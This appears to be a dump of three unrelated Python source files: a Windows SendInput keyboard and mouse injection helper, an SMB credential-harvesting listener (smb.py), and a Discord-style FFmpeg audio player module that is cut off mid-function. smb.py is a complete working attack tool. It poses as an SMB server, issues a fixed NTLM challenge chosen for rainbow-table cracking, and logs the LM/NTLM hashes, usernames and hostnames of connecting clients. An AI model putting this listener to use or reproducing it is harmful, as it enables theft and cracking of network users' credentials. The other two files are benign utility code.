            self.keys_process = Thread(target=self.keys_worker.processQueue)
            self.keys_process.start()
        # add keys to queue; trailing None lets the worker exit when drained
        for item in key_queue:
            self.keys_worker.key_queue.put(item)
        self.keys_worker.key_queue.put(None)
        return True

    # direct key press
    def directKey(self, key, direction = None, type = None):
        """Send a single key press/release immediately (bypasses the queue).

        *key* is a name from the active table or a "0x.." code string;
        unknown names fall back to code 0.
        """
        if type is None:
            type = self.direct_keys
        if direction is None:
            direction = self.key_press
        if key.startswith("0x"):
            key = int(key, 16)
        else:
            key = key.upper()
        lookup_table = self.dk if type == self.direct_keys else self.vk
        key = lookup_table[key] if key in lookup_table else 0x0000
        self.keys_worker.sendKey(key, direction | type)

    # direct mouse move or button press
    def directMouse(self, dx = 0, dy = 0, buttons = 0):
        """Move the mouse by (dx, dy) and/or send button flag events."""
        self.keys_worker.sendMouse(dx, dy, buttons)
# threaded sending keys class
# threaded sending keys class
class KeysWorker():
    """Replays queued key events and performs the low-level Win32
    ``SendInput`` calls for the owning :class:`Keys` instance.

    NOTE(review): depends on the module-level INPUT/MOUSEINPUT/
    KEYBDINPUT ctypes structures and ``ctypes.windll`` — Windows only.
    """
    # keys object (back-reference to the owning Keys instance)
    keys = None
    # queue of keys; class attribute, so it is shared by all instances
    key_queue = Queue()

    # init
    def __init__(self, keys):
        self.keys = keys

    # main function, process key's queue in loop
    def processQueue(self):
        """Consume queued key dicts; a ``None`` sentinel ends the loop
        once the queue is drained.  Each dict either presses/releases a
        key (with an optional hold time) or is a pure pause entry."""
        # endless loop
        while True:
            # get one key
            key = self.key_queue.get()
            # terminate process if queue is empty
            if key is None:
                self.key_queue.task_done()
                if self.key_queue.empty():
                    return
                # sentinel arrived but more work was queued meanwhile
                continue
            # print key (only when a host logger is attached)
            elif not self.keys.standalone:
                self.keys.common.info("Key: \033[1;35m%s/%s\033[0;37m, duration: \033[1;35m%f\033[0;37m, direction: \033[1;35m%s\033[0;37m, type: \033[1;35m%s" % (
                    key["okey"] if key["okey"] else "None",
                    key["key"], key["time"],
                    "UP" if key["up"] and not key["down"] else "DOWN" if not key["up"] and key["down"] else "BOTH" if key["up"] and key["down"] else "NONE",
                    "None" if key["type"] is None else "DK" if key["type"] == self.keys.direct_keys else "VK"), "\033[0;35mKEY: \033[0;37m"
                )
            # if it's a key
            if key["key"]:
                # press
                if key["down"]:
                    self.sendKey(key["key"], self.keys.key_press | key["type"])
                # wait (hold duration between press and release)
                sleep(key["time"])
                # and release
                if key["up"]:
                    self.sendKey(key["key"], self.keys.key_release | key["type"])
            # not an actual key, just pause
            else:
                sleep(key["time"])
            # mark as done (decrement internal queue counter)
            self.key_queue.task_done()

    # send key
    def sendKey(self, key, type):
        self.SendInput(self.Keyboard(key, type))

    # send mouse
    def sendMouse(self, dx, dy, buttons):
        # any movement implies the mouse_move (MOUSEEVENTF_MOVE) flag
        if dx != 0 or dy != 0:
            buttons |= self.keys.mouse_move
        self.SendInput(self.Mouse(buttons, dx, dy))

    # send input
    def SendInput(self, *inputs):
        # marshal the INPUT structures into a ctypes array and hand
        # them to user32.SendInput; returns the number of events sent
        nInputs = len(inputs)
        LPINPUT = INPUT * nInputs
        pInputs = LPINPUT(*inputs)
        cbSize = ctypes.c_int(ctypes.sizeof(INPUT))
        return ctypes.windll.user32.SendInput(nInputs, pInputs, cbSize)

    # get input object
    def Input(self, structure):
        # wrap a concrete *INPUT struct in the tagged INPUT union
        # (tag 0 = mouse, 1 = keyboard, 2 = hardware)
        if isinstance(structure, MOUSEINPUT):
            return INPUT(0, _INPUTunion(mi=structure))
        if isinstance(structure, KEYBDINPUT):
            return INPUT(1, _INPUTunion(ki=structure))
        if isinstance(structure, HARDWAREINPUT):
            return INPUT(2, _INPUTunion(hi=structure))
        raise TypeError('Cannot create INPUT structure!')

    # mouse input
    def MouseInput(self, flags, x, y, data):
        return MOUSEINPUT(x, y, data, flags, 0, None)

    # keyboard input
    def KeybdInput(self, code, flags):
        # the code is used for both the wVk and wScan fields
        return KEYBDINPUT(code, code, flags, 0, None)

    # hardware input
    def HardwareInput(self, message, parameter):
        return HARDWAREINPUT(message & 0xFFFFFFFF,
                             parameter & 0xFFFF,
                             parameter >> 16 & 0xFFFF)

    # mouse object
    def Mouse(self, flags, x=0, y=0, data=0):
        return self.Input(self.MouseInput(flags, x, y, data))

    # keyboard object
    def Keyboard(self, code, flags=0):
        return self.Input(self.KeybdInput(code, flags))

    # hardware object
    def Hardware(self, message, parameter=0):
        return self.Input(self.HardwareInput(message, parameter))
# types
# ctypes aliases matching the Windows API type names
LONG = ctypes.c_long
DWORD = ctypes.c_ulong
ULONG_PTR = ctypes.POINTER(DWORD)
WORD = ctypes.c_ushort

# The structures below mirror the Win32 SendInput layouts; the field
# order defines the binary layout — do not reorder.
class MOUSEINPUT(ctypes.Structure):
    _fields_ = (('dx', LONG),
                ('dy', LONG),
                ('mouseData', DWORD),
                ('dwFlags', DWORD),
                ('time', DWORD),
                ('dwExtraInfo', ULONG_PTR))

class KEYBDINPUT(ctypes.Structure):
    _fields_ = (('wVk', WORD),
                ('wScan', WORD),
                ('dwFlags', DWORD),
                ('time', DWORD),
                ('dwExtraInfo', ULONG_PTR))

class HARDWAREINPUT(ctypes.Structure):
    _fields_ = (('uMsg', DWORD),
                ('wParamL', WORD),
                ('wParamH', WORD))

# tagged union: exactly one of mi/ki/hi is valid, selected by INPUT.type
class _INPUTunion(ctypes.Union):
    _fields_ = (('mi', MOUSEINPUT),
                ('ki', KEYBDINPUT),
                ('hi', HARDWAREINPUT))

class INPUT(ctypes.Structure):
    _fields_ = (('type', DWORD),
                ('union', _INPUTunion))
# example usage (runs only when the module is executed directly):
if __name__ == '__main__':
    sleep(3)  # give the user time to focus the target window
    keys = Keys()
    # mouse movement (relative moves, increasing leftward steps)
    for i in range(100):
        keys.directMouse(-1*i, 0)
        sleep(0.004)
    # mouse keys
    keys.directMouse(buttons=keys.mouse_rb_press)
    sleep(0.5)
    keys.directMouse(buttons=keys.mouse_lb_press)
    sleep(2)
    keys.directMouse(buttons=keys.mouse_lb_release)
    sleep(0.5)
    keys.directMouse(buttons=keys.mouse_rb_release)
    # or combine several button flags in one call
    keys.directMouse(buttons=keys.mouse_lb_press | keys.mouse_rb_press)
    sleep(2)
    keys.directMouse(buttons=keys.mouse_lb_release | keys.mouse_rb_release)
    # keyboard (direct keys)
    keys.directKey("a")
    sleep(0.04)
    keys.directKey("a", keys.key_release)
    # keyboard (virtual keys)
    keys.directKey("a", type=keys.virtual_keys)
    sleep(0.04)
    keys.directKey("a", keys.key_release, keys.virtual_keys)
    # queue of keys (direct keys, threaded, only for keyboard input)
    keys.parseKeyString("a_down,-4,a_up,0x01")  # -4 - pause for 4 ms, 0x01 - hex code of Esc
    # queue of keys (virtual keys, threaded, only for keyboard input)
    keys.parseKeyString("vk,a_down,-4,a_up")  # -4 - pause for 4 ms
smb.py | import socket
import struct
import sys
import util
from threading import Thread
from service import Service
class smb(Service):
    """SMB listener that harvests NTLM/LM authentication hashes.

    Speaks just enough of the SMB negotiate/session-setup dialogue to
    issue a fixed NTLMSSP challenge (1122334455667788) and record the
    hashed credentials clients answer with.

    NOTE(review): this module is Python 2 code (str-as-bytes indexing,
    ``ord()`` over buffer characters); the fragile ``is`` comparisons
    against literals have been replaced with ``==``.
    """

    def __init__(self):
        super(smb, self).__init__('SMB Service')
        self.config['port'].value = 445
        self.captured_hashes = {}  # uname -> [host name, LM hash, NTLM hash]
        self.info = """
            SMB listener for harvesting NTLM/LM hashes.
            Authentication requests use the standard challenge of
            1122334455667788, for which plenty of generated rainbow
            tables exist already.
            """

    # parse NTLM/LM hashes
    # scapy has very limited SMB packet support, so we have to do this manually
    def parse_credentials(self, data):
        """Extract the LM/NTLM responses, host and user name from an
        NTLMSSP_AUTH packet and record/log them once per user."""
        # offsets based on security blob starting at data[59]
        data = data[59:]
        lm_offset = struct.unpack('<I', data[16:20])[0]
        ntlm_offset = struct.unpack('<I', data[24:28])[0]
        name_length = struct.unpack('<h', data[36:38])[0]
        name_offset = struct.unpack('<I', data[40:44])[0]
        host_length = struct.unpack('<h', data[46:48])[0]
        host_offset = struct.unpack('<I', data[48:52])[0]
        lm_hash = ntlm_hash = ''
        # LM hash (24 bytes rendered as zero-padded hex)
        for i in data[lm_offset:lm_offset + 24]:
            tmp = str(hex(ord(i))).replace('0x', '')
            if len(tmp) == 1:  # was `is 1` — identity test on a literal
                # hex() removes leading 0's in hex; we need them.
                tmp = '0' + tmp
            lm_hash += tmp
        # NTLM hash
        for i in data[ntlm_offset:ntlm_offset + 24]:
            tmp = str(hex(ord(i))).replace('0x', '')
            if len(tmp) == 1:
                tmp = '0' + tmp
            ntlm_hash += tmp
        # host name (UTF-16LE, so skip the interleaved NUL bytes)
        hname = ''
        for i in range(host_offset, (host_offset + host_length)):
            tmp = struct.unpack('<c', data[i])[0]
            if tmp == '\x00':  # was `is '\x00'`
                continue
            hname += tmp
        if name_length > 100:
            # sanity
            return
        # user name (also UTF-16LE)
        uname = ''
        for i in range(name_offset, (name_offset + name_length)):
            tmp = struct.unpack('<c', data[i])[0]
            if tmp == '\x00':
                # null bytes
                continue
            uname += tmp
        # add the username and build the list
        # list consists of
        # HOST NAME
        # LM HASH
        # NTLM HASH
        if uname not in self.captured_hashes:
            tmp = [hname, lm_hash.upper(), ntlm_hash.upper()]
            self.captured_hashes[uname] = tmp
            data = 'Username: %s\nHost: %s\nLM: %s\nNTLM: %s\nChallenge: %s\n' \
                % (uname, hname, lm_hash.upper(),
                   ntlm_hash.upper(), '1122334455667788')
            self.log_msg(data)

    # get packet payload
    def get_payload(self, data):
        """Return ``(response_payload, close_flag)`` for one SMB request;
        ``close_flag`` of 1 asks the caller to drop the connection."""
        hexcode = str(hex(ord(data[4])))
        if hexcode == '0x72':
            # Build the payload for a Negotiate Protocol Response
            # netbios
            payload = "\x00\x00\x00\x55"
            # smb header
            payload += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8"
            payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            payload += "\xff\xff\xff\xfe\x00\x00\x00\x00"
            # negotiate protocol response
            payload += "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00"
            payload += "\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x80"
            payload += "\x11\xb9\x14\xe4\x77\xc8\xcd\x01\x68\x01\x00\x10"
            payload += "\x00\xb5\x9b\x73\x9d\xb7\xc2\xb7\x40\x83\xd6\x52"
            payload += "\x31\xec\xb3\x84\x53"
            return (payload, 0)
        elif hexcode == '0x73':
            # check if its a NEGOTIATE or AUTH
            message_type = str(hex(ord(data[67])))
            if message_type == '0x1':
                # Build the payload for a NTLMSSP_CHALLENGE
                # netbios
                payload = "\x00\x00\x00\xdd"
                # smb header
                payload += "\xff\x53\x4d\x42\x73\x16"
                payload += "\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00"
                payload += "\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                payload += "\x00\x08\x10\x00"
                # session setup andx response, error more processing
                payload += "\x04\xff\x00\xdd\x00\x00\x00\x68\x00\xb2\x00"
                payload += "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00"
                payload += "\x00\x04\x00\x04\x00\x38\x00\x00\x00\x15\x82"
                payload += "\x8a\xe2\x11\x22\x33\x44\x55\x66\x77\x88\x00" #ntlm challenge 1122334455667788
                payload += "\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x2c\x00"
                payload += "\x3c\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00"
                payload += "\x0f\x4e\x00\x4f\x00\x02\x00\x04\x00\x4e\x00"
                payload += "\x4f\x00\x01\x00\x04\x00\x4e\x00\x4f\x00\x04"
                payload += "\x00\x04\x00\x6e\x00\x6f\x00\x03\x00\x04\x00"
                payload += "\x6e\x00\x6f\x00\x06\x00\x04\x00\x01\x00\x00"
                payload += "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e"
                payload += "\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00"
                payload += "\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69"
                payload += "\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00"
                payload += "\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20"
                payload += "\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
                payload += "\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72"
                payload += "\x00\x00"
                return (payload, 0)
            elif message_type == '0x3':
                # should be an AUTH packet
                # parse credentials
                self.parse_credentials(data)
                # send a STATUS_LOGIN_FAILURE
                # netbios
                payload = "\x00\x00\x00\x23"
                # smb header
                payload += "\xff\x53\x4d\x42\x73\x6d\x00\x00\xc0\x98\x07"
                payload += "\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                payload += "\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
                # session setup andx response, status_login_failure
                payload += "\x00\x00\x00"
                return (payload, 1)
        else:
            return (None, 1)

    # dbg -- dump the packet
    def dbg_dump(self, data):
        """Debug helper: hex-dump *data*, 16 bytes per row."""
        cnt = 0
        for i in data:
            sys.stdout.write(str(hex(ord(i))) + ' ')
            cnt += 1
            if cnt % 16 == 0:
                print('')
                cnt = 0
        print('')

    # handle packets
    def handler(self, con, data):
        """Respond to one SMB request; return False to drop the connection."""
        try:
            if len(data) > 4:
                data = data[4:]
                (payload, err) = self.get_payload(data)
                if payload is not None and err == 0:  # was `err is 0`
                    con.send(payload)
                elif payload is not None and err == 1:
                    con.send(payload)
                    return False
                else:
                    return False
        except Exception as j:  # `except Exception, j` is py2-only syntax
            util.Error('SMB error: %s' % j)
            return False
        return True

    # threaded init
    def initialize_bg(self):
        """Start the blocking listener on a background thread."""
        util.Msg('Starting SMB listener...')
        thread = Thread(target=self.initialize)
        thread.start()
        return True

    # initialize SMB listener
    def initialize(self):
        """Accept connections on the configured port and feed each
        request through :meth:`handler` until stopped."""
        socker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        socker.settimeout(3)  # periodic timeout so self.running is re-checked
        socker.bind(('', self.config['port'].value))
        socker.listen(5)
        self.running = True
        try:
            while self.running:
                try:
                    con, addr = socker.accept()
                except KeyboardInterrupt:
                    break
                except:
                    continue  # accept timeout: loop to re-check self.running
                self.log_msg('Connection from %s' % addr[0])
                while self.running:
                    data = con.recv(256)
                    if not self.handler(con, data):
                        break
                con.shutdown(socket.SHUT_RDWR)
                con.close()
                self.log_msg('Closed connection with %s.\n' % addr[0])
        except KeyboardInterrupt:
            self.running = False
        except socket.error:
            pass
        except Exception as j:
            util.Error('Error with SMB listener: %s' % j)
        self.running = False
        socker.close()
        util.debug('SMB listener shutdown.')

    def cli(self, parser):
        """ initialize CLI options
        """
        parser.add_argument('--smb', help='SMB Service', action='store_true',
                            default=False, dest=self.which)
|
player.py | """
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz 2021-present CuzImSyntax
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
# Flag passed to subprocess creation on Windows so ffmpeg does not flash
# a console window; on every other platform it must be zero (no-op).
CREATE_NO_WINDOW: int = 0x08000000 if sys.platform == 'win32' else 0
class AudioSource:
    """Base class for audio streams fed to a voice client.

    A source yields either Opus-encoded frames or raw 16-bit 48KHz
    stereo PCM; :meth:`is_opus` tells the player which format to expect.

    .. warning::

        The audio source reads are done in a separate thread.
    """

    def read(self) -> bytes:
        """Read 20ms worth of audio.

        Subclasses must implement this.  Returning an empty
        :term:`py:bytes-like object` signals that the audio is complete.

        When :meth:`~AudioSource.is_opus` returns ``True`` this must be
        20ms of Opus encoded audio; otherwise 20ms of 16-bit 48KHz
        stereo PCM, roughly 3,840 bytes per frame.

        Returns
        --------
        :class:`bytes`
            A bytes like object that represents the PCM or Opus data.
        """
        raise NotImplementedError

    def is_opus(self) -> bool:
        """Whether this source is already encoded in Opus."""
        return False

    def cleanup(self) -> None:
        """Hook for releasing buffers or child processes once playback
        is finished.  The default implementation does nothing."""
        pass

    def __del__(self) -> None:
        # best-effort cleanup when the source is garbage collected
        self.cleanup()
class PCMAudio(AudioSource):
    """Represents raw 16-bit 48KHz stereo PCM audio source.

    Attributes
    -----------
    stream: :term:`py:file object`
        A file-like object that reads byte data representing raw PCM.
    """

    def __init__(self, stream: io.BufferedIOBase) -> None:
        self.stream: io.BufferedIOBase = stream

    def read(self) -> bytes:
        frame = self.stream.read(OpusEncoder.FRAME_SIZE)
        # A short read means the stream is exhausted: signal end-of-source.
        return frame if len(frame) == OpusEncoder.FRAME_SIZE else b''
class FFmpegAudio(AudioSource):
    """Represents an FFmpeg (or AVConv) based AudioSource.

    User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
    :class:`FFmpegOpusAudio` work should subclass this.

    .. versionadded:: 1.3
    """

    def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
        # Piping mode: caller supplies a file-like object fed into ffmpeg's stdin.
        piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
        if piping and isinstance(source, str):
            raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")

        args = [executable, *args]
        kwargs = {'stdout': subprocess.PIPE}
        kwargs.update(subprocess_kwargs)

        self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
        self._stdout: IO[bytes] = self._process.stdout  # type: ignore
        # Fix: the annotation previously read ``IO[Bytes]`` -- ``Bytes`` is not
        # a defined name; the stdin pipe carries ``bytes``.
        self._stdin: Optional[IO[bytes]] = None
        self._pipe_thread: Optional[threading.Thread] = None

        if piping:
            n = f'popen-stdin-writer:{id(self):#x}'
            self._stdin = self._process.stdin
            self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
            self._pipe_thread.start()

    def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
        """Launch the ffmpeg subprocess, mapping launch failures to ClientException."""
        process = None
        try:
            process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
        except FileNotFoundError:
            # ``args`` may be a shell string or an argv list; extract the executable.
            executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
            raise ClientException(executable + ' was not found.') from None
        except subprocess.SubprocessError as exc:
            raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
        else:
            return process

    def _kill_process(self) -> None:
        """Kill the subprocess and wait for it to exit, logging each stage."""
        proc = self._process
        if proc is MISSING:
            # cleanup() already ran.
            return

        _log.info('Preparing to terminate ffmpeg process %s.', proc.pid)

        try:
            proc.kill()
        except Exception:
            _log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)

        if proc.poll() is None:
            _log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
            # communicate() drains the pipes and blocks until the process exits.
            proc.communicate()
            _log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
        else:
            _log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)

    def _pipe_writer(self, source: io.BufferedIOBase) -> None:
        """Background thread body: stream ``source`` into the subprocess stdin."""
        while self._process:
            # arbitrarily large read size
            data = source.read(8192)
            if not data:
                self._process.terminate()
                return
            try:
                self._stdin.write(data)
            except Exception:
                _log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
                # at this point the source data is either exhausted or the process is fubar
                self._process.terminate()
                return

    def cleanup(self) -> None:
        self._kill_process()
        # MISSING marks the handles as dead so _kill_process is idempotent.
        self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
    """An audio source from FFmpeg (or AVConv) producing raw PCM.

    This launches a sub-process for the given input and reads 16-bit 48KHz
    stereo PCM from its stdout.

    .. warning::

        You must have the ffmpeg or avconv executable in your path environment
        variable in order for this to work.

    Parameters
    ------------
    source: Union[:class:`str`, :class:`io.BufferedIOBase`]
        The input that ffmpeg will take and convert to PCM bytes.
        If ``pipe`` is ``True`` then this is a file-like object that is
        passed to the stdin of ffmpeg.
    executable: :class:`str`
        The executable name (and path) to use. Defaults to ``ffmpeg``.
    pipe: :class:`bool`
        If ``True``, denotes that ``source`` parameter will be passed
        to the stdin of ffmpeg. Defaults to ``False``.
    stderr: Optional[:term:`py:file object`]
        A file-like object to pass to the Popen constructor.
        Could also be an instance of ``subprocess.PIPE``.
    before_options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
    options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg after the ``-i`` flag.

    Raises
    --------
    ClientException
        The subprocess failed to be created.
    """

    def __init__(
        self,
        source: Union[str, io.BufferedIOBase],
        *,
        executable: str = 'ffmpeg',
        pipe: bool = False,
        stderr: Optional[IO[str]] = None,
        before_options: Optional[str] = None,
        options: Optional[str] = None
    ) -> None:
        subprocess_kwargs = {
            'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL,
            'stderr': stderr,
        }

        # Assemble the ffmpeg command line: user flags, input, fixed PCM
        # output format, more user flags, then write to stdout.
        cmdline = []
        if isinstance(before_options, str):
            cmdline.extend(shlex.split(before_options))

        cmdline.append('-i')
        cmdline.append('-' if pipe else source)
        cmdline.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))

        if isinstance(options, str):
            cmdline.extend(shlex.split(options))

        cmdline.append('pipe:1')

        super().__init__(source, executable=executable, args=cmdline, **subprocess_kwargs)

    def read(self) -> bytes:
        frame = self._stdout.read(OpusEncoder.FRAME_SIZE)
        # A short read signals end of stream.
        return frame if len(frame) == OpusEncoder.FRAME_SIZE else b''

    def is_opus(self) -> bool:
        return False
class FFmpegOpusAudio(FFmpegAudio):
    """An audio source from FFmpeg (or AVConv).

    This launches a sub-process to a specific input file given. However, rather than
    producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
    Opus, this class produces Opus packets, skipping the encoding step done by the library.

    Alternatively, instead of instantiating this class directly, you can use
    :meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
    can be used to opportunistically skip pointless re-encoding of existing Opus audio data
    for a boost in performance at the cost of a short initial delay to gather the information.
    The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
    know that the input source is Opus encoded beforehand.

    .. versionadded:: 1.3

    .. warning::

        You must have the ffmpeg or avconv executable in your path environment
        variable in order for this to work.

    Parameters
    ------------
    source: Union[:class:`str`, :class:`io.BufferedIOBase`]
        The input that ffmpeg will take and convert to Opus bytes.
        If ``pipe`` is ``True`` then this is a file-like object that is
        passed to the stdin of ffmpeg.
    bitrate: :class:`int`
        The bitrate in kbps to encode the output to. Defaults to ``128``.
    codec: Optional[:class:`str`]
        The codec to use to encode the audio data. Normally this would be
        just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
        opportunistically skip pointlessly re-encoding Opus audio data by passing
        ``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
        ``libopus`` will be considered ``libopus``. Defaults to ``libopus``.

        .. warning::

            Do not provide this parameter unless you are certain that the audio input is
            already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
            should be used to determine the proper value for this parameter.

    executable: :class:`str`
        The executable name (and path) to use. Defaults to ``ffmpeg``.
    pipe: :class:`bool`
        If ``True``, denotes that ``source`` parameter will be passed
        to the stdin of ffmpeg. Defaults to ``False``.
    stderr: Optional[:term:`py:file object`]
        A file-like object to pass to the Popen constructor.
        Could also be an instance of ``subprocess.PIPE``.
    before_options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
    options: Optional[:class:`str`]
        Extra command line arguments to pass to ffmpeg after the ``-i`` flag.

    Raises
    --------
    ClientException
        The subprocess failed to be created.
    """

    def __init__(
        self,
        source: Union[str, io.BufferedIOBase],
        *,
        bitrate: int = 128,
        codec: Optional[str] = None,
        executable: str = 'ffmpeg',
        pipe=False,
        stderr=None,
        before_options=None,
        options=None,
    ) -> None:
        args = []
        subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}

        if isinstance(before_options, str):
            args.extend(shlex.split(before_options))

        args.append('-i')
        args.append('-' if pipe else source)

        # Fix: also accept 'copy' itself.  The docstring (and from_probe)
        # promise that passing ``codec='copy'`` skips re-encoding, but the
        # previous check (``codec in ('opus', 'libopus')``) silently
        # downgraded an explicit 'copy' to 'libopus'.
        codec = 'copy' if codec in ('opus', 'libopus', 'copy') else 'libopus'

        args.extend(('-map_metadata', '-1',
                     '-f', 'opus',
                     '-c:a', codec,
                     '-ar', '48000',
                     '-ac', '2',
                     '-b:a', f'{bitrate}k',
                     '-loglevel', 'warning'))

        if isinstance(options, str):
            args.extend(shlex.split(options))

        args.append('pipe:1')

        super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
        # ffmpeg emits an Ogg container; pull Opus packets straight out of it.
        self._packet_iter = OggStream(self._stdout).iter_packets()

    @classmethod
    async def from_probe(
        cls: Type[FT],
        source: str,
        *,
        method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
        **kwargs: Any,
    ) -> FT:
        """|coro|

        A factory method that creates a :class:`FFmpegOpusAudio` after probing
        the input source for audio codec and bitrate information.

        Examples
        ----------

        Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::

            source = await discord.FFmpegOpusAudio.from_probe("song.webm")
            voice_client.play(source)

        If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
        to probe using ffmpeg instead: ::

            source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
            voice_client.play(source)

        Using a custom method of determining codec and bitrate: ::

            def custom_probe(source, executable):
                # some analysis code here
                return codec, bitrate

            source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
            voice_client.play(source)

        Parameters
        ------------
        source
            Identical to the ``source`` parameter for the constructor.
        method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
            The probing method used to determine bitrate and codec information. As a string, valid
            values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
            (or avconv). As a callable, it must take two string arguments, ``source`` and
            ``executable``. Both parameters are the same values passed to this factory function.
            ``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
        kwargs
            The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
            excluding ``bitrate`` and ``codec``.

        Raises
        --------
        AttributeError
            Invalid probe method, must be ``'native'`` or ``'fallback'``.
        TypeError
            Invalid value for ``probe`` parameter, must be :class:`str` or a callable.

        Returns
        --------
        :class:`FFmpegOpusAudio`
            An instance of this class.
        """
        executable = kwargs.get('executable')
        codec, bitrate = await cls.probe(source, method=method, executable=executable)
        return cls(source, bitrate=bitrate, codec=codec, **kwargs)  # type: ignore

    @classmethod
    async def probe(
        cls,
        source: str,
        *,
        method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
        executable: Optional[str] = None,
    ) -> Tuple[Optional[str], Optional[int]]:
        """|coro|

        Probes the input source for bitrate and codec information.

        Parameters
        ------------
        source
            Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
        method
            Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
        executable: :class:`str`
            Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.

        Raises
        --------
        AttributeError
            Invalid probe method, must be ``'native'`` or ``'fallback'``.
        TypeError
            Invalid value for ``probe`` parameter, must be :class:`str` or a callable.

        Returns
        ---------
        Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
            A 2-tuple with the codec and bitrate of the input source.
        """
        method = method or 'native'
        executable = executable or 'ffmpeg'
        probefunc = fallback = None

        if isinstance(method, str):
            probefunc = getattr(cls, '_probe_codec_' + method, None)
            if probefunc is None:
                raise AttributeError(f"Invalid probe method {method!r}")
            if probefunc is cls._probe_codec_native:
